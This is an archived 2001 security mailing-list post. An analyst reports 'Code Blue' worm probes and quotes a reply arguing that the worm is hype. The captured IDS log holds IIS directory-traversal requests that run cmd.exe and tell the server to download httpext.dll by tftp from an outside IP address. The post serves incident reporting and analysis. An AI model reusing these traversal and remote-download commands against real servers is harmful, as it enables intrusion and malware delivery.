Actually, Code Blue is in the wild, and has been seen both in the UK and the US. At this point, our SOC has only seen probes and attempts to infect, but we have not yet seen any successful attacks as yet. This may be because this worm targets the unicode vulnerability rather than a newer and unpatched vulnerability. Also, its scanning ability seems very slow and does not cross many netblocks as yet, but we do have confirmation that it is indeed beginning to bleed over into other networks. Right now all source attacks have been from the APNIC area of the world. Below is a copy of session data captured by a Dragon IDS. Within the data you will see the unique directory traversal attempt with the multi dot-dot and the tftp attempt to download the httpext.dll file which may be the vbs script that launches the scan. GET /{A} /............/winnt/system32/cmd.exe?/c+dir{D}{A} GET /{A} /............/winnt/system32/cmd.exe?/c+dir{D}{A} {A} HTTP/1.1 200 OK{D}{A} Server: Microsoft-IIS/5.0{D}{A} Date: Tue, 11 Sep 2001 15:08:05 GMT{D}{A} {D}{A} < html > {D}{A} < head > {D}{A} var currentImage ="menu0";{D}{A} {D}{A} if (document.images) {{D}{A} {D}{A} menu0Off = new Image();{D}{A} menu0Off.src = path + "";{D}{A} menu0Hi = new Image();{D}{A} menu0Hi.src = path + ""; {D}{A} {9}{9}{D}{A} {9}{9}menu1Off = new Image();{D}{A} {D}{A} < html > {D}{A} < head > {D}{A} < title > {D}{A} GET /{A} /............/winnt/system32/cmd.exe?/c+tftp+-i+165.194.27.107+get+httpe xt.dll{D}{A} GET /{A} /............/winnt/system32/cmd.exe?/c+tftp+-i+165.194.27.107+get+httpe xt.dll{D}{A} {A} HTTP/1.1 200 OK{D}{A} Server: Microsoft-IIS/5.0{D}{A} Date: Tue, 11 Sep 2001 15:08:09 GMT{D}{A} The whois information for the IP that hosts the httpext.dll is Korean- Chungang University (NET-CAU-NET) Chungang University Computing Center Huksok-dong 221, Tongjak-ku, Seoul, 156-756 KR -----Original Message----- From: Nick FitzGerald [mailto:nick@virus-l.demon.co.uk] Sent: Wednesday, September 12, 2001 3:57 PM To: Lists - incidents Subject: Re: Any one seen any evidence of "Code Blue?" Michael Katz <mikeat_private> wrote: > Why have I not seen anything on this list about the "Code Blue" worm? ... Because it is hype and does not exist in the wild, or if it does, it is so buggy/flawed that it is effectively non-viable in "real world" infestations. > ... I > have received some alerts and news stories about a "Code Blue" worm: Ignore the hype -- here are some real facts: 1. CodeRed.C (aka CodeRedII) had compromised perhaps 200,000 machines within less than 12 hours of its release. That is, it (almost) saturated the population of non-patched, Internet-accessible IIS machines in about half the time CodeRed.B did (although CodeRed.B hit more machines total because news of its earlier spread alerted some system admins to patch their potentially vulnerable machines). 2. In the days following CodeRed.C's release, I regularly captured samples with a trivial "worm catcher" (netcat listening on port 80) in less than an hour of going on-line with a dial-up connection. I did this consistently from a United Airlines lounge in Chicago, on several different ISPs in Los Angeles, 2 or 3 different ISPs in Dallas, again back in LA and have consistently caught around 100 CodeRed.C and CodeRed.D samples per day since returning to New Zealand (pro-rated for hours on-line). 3. I caught one of the first samples of CodeRed.D and apparently did so within a few hours of its release. I now see dozens and dozens a day -- roughly half of my daily CodeRed catches are the .D variant. Thus, I would expect to have seen at least one sample of something that is "worse than CodeRed" as CodeRed.D spreads about the same or slightly less successfully than CodeRed.C. 4. CodeBlue (aka BlueCode) is repeatedly said to be "potentially much worse" than CodeRed.C with "the potential to spread much faster". Some (snake-oilers) drop the "potentially" when repeating those claims about this reputed new "super worm"... 5. It is now 5 (? 6??) days since CodeBlue was reputedly released yet my "worm catcher" (I've been using something more sophisticated than the netcat-based one since returning to LA from Dallas and before returning home) has not caught a single sample of CodeBlue. 6. Despite claims (by the snake-oilers) that CodeBlue is rampant -- and thus should be "killing" huge numbers of CodeReds *and* be "inoculating" those machines from further CodeRed (re-)infestation -- neither my worm catcher nor any of the others in the network of worm catchers it is part of has seen any CodeBlue *and* those worm catchers are still seeing similar levels of CodeRed.C and .D each day. In fact, the CodeRed capture rate has remained fairly consistent with that seen prior to the first mention of BlueCode. My conclusion -- CodeBlue is vendor snake-oil and/or media hype. [To the journalists who will write asking for a quote if this is posted to the list, you may use "CodeBlue is vendor snake-oil and/or media hype" without seeking further quoting permission.] Regards, Nick FitzGerald ------------------------------------------------------------------------ ---- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 12 2001 - 10:25:47 PDT